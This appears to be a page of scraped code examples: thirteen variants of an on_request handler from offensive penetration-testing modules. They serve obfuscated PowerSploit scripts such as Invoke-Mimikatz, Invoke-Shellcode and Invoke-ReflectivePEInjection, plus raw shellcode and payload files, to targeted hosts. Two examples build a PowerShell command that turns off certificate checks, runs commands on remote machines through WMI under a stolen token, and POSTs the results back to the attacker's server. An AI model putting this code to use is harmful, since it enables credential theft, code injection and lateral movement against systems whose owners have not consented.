Пример #1
0
    def on_request(self, context, request):
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(
                    os.path.join(
                        base_dir,
                        'data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1'),
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.shellcode_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(self.shellcode_path, 'rb') as shellcode:
                request.wfile.write(shellcode.read())

            #Target has the shellcode, stop tracking the host
            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
Пример #2
0
    def on_request(self, context, request):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(
                    'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1',
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif 'TokenRider.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            #Command to execute on the target system(s)
            command_to_execute = 'cmd.exe /c {}'.format(self.command)
            #context.log.debug(command_to_execute)

            #This will get executed in the process that was created with the impersonated token
            elevated_ps_command = '''
            [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
            function Send-POSTRequest {{
                [CmdletBinding()]
                Param (
                    [string] $data
                )
                $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
                $request.Method = 'POST';
                $request.ContentType = 'application/x-www-form-urlencoded';
                $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
                $request.ContentLength = $bytes.Length;
                $requestStream = $request.GetRequestStream();
                $requestStream.Write( $bytes, 0, $bytes.Length );
                $requestStream.Close();
                $request.GetResponse();
            }}

            $post_output = "";
            $targets = @({targets});
            foreach ($target in $targets){{
                try{{
                    Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
                    $post_output = $post_output + "Executed command on $target! `n";
                }} catch {{
                    $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
                }}
            }}
            Send-POSTRequest $post_output'''.format(
                server=context.server,
                addr=context.localip,
                port=context.server_port,
                targets=self.target_computers,
                command=command_to_execute)

            request.wfile.write(elevated_ps_command)

        else:
            request.send_response(404)
            request.end_headers()
Пример #3
0
    def on_request(self, context, request):
        if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(
                    os.path.join(
                        base_dir,
                        'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1'
                    ), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.payload_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.stop_tracking_host()

            with open(self.payload_path, 'rb') as payload:
                request.wfile.write(payload.read())

        else:
            request.send_response(404)
            request.end_headers()
Пример #4
0
    def on_request(self, context, request):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(os.path.join(base_dir,'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif 'TokenRider.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            #Command to execute on the target system(s)
            command_to_execute  = 'cmd.exe /c {}'.format(self.command)
            #context.log.debug(command_to_execute)

            #This will get executed in the process that was created with the impersonated token
            elevated_ps_command = '''
            [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
            function Send-POSTRequest {{
                [CmdletBinding()]
                Param (
                    [string] $data
                )
                $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
                $request.Method = 'POST';
                $request.ContentType = 'application/x-www-form-urlencoded';
                $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
                $request.ContentLength = $bytes.Length;
                $requestStream = $request.GetRequestStream();
                $requestStream.Write( $bytes, 0, $bytes.Length );
                $requestStream.Close();
                $request.GetResponse();
            }}

            $post_output = "";
            $targets = @({targets});
            foreach ($target in $targets){{
                try{{
                    Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
                    $post_output = $post_output + "Executed command on $target! `n";
                }} catch {{
                    $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
                }}
            }}
            Send-POSTRequest $post_output'''.format(server=context.server, 
                                                    addr=context.localip, 
                                                    port=context.server_port,
                                                    targets=self.target_computers,
                                                    command=command_to_execute)

            request.wfile.write(elevated_ps_command)

        else:
            request.send_response(404)
            request.end_headers()
Пример #5
0
    def on_request(self, context, request):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open('data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Пример #6
0
    def on_request(self, context, request):
        if 'PowerView.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open('data/PowerSploit/Recon/PowerView.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read())
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Пример #7
0
    def on_request(self, context, request):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open('data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Пример #8
0
    def on_request(self, context, request):
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(os.path.join(base_dir,'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Пример #9
0
    def on_request(self, context, request):
        if "Invoke-Mimikatz.ps1" == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open("data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1", "r") as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Пример #10
0
    def on_request(self, context, request):
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
Пример #11
0
    def on_request(self, context, request):
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(
                    os.path.join(
                        base_dir,
                        'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'),
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Пример #12
0
    def on_request(self, context, request):
        if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open('data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.payload_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.stop_tracking_host()

            with open(self.payload_path, 'rb') as payload:
                request.wfile.write(payload.read())

        else:
            request.send_response(404)
            request.end_headers()
Пример #13
0
    def on_request(self, context, request):
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1' ,'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.shellcode_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(self.shellcode_path, 'rb') as shellcode:
                request.wfile.write(shellcode.read())

            #Target has the shellcode, stop tracking the host
            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()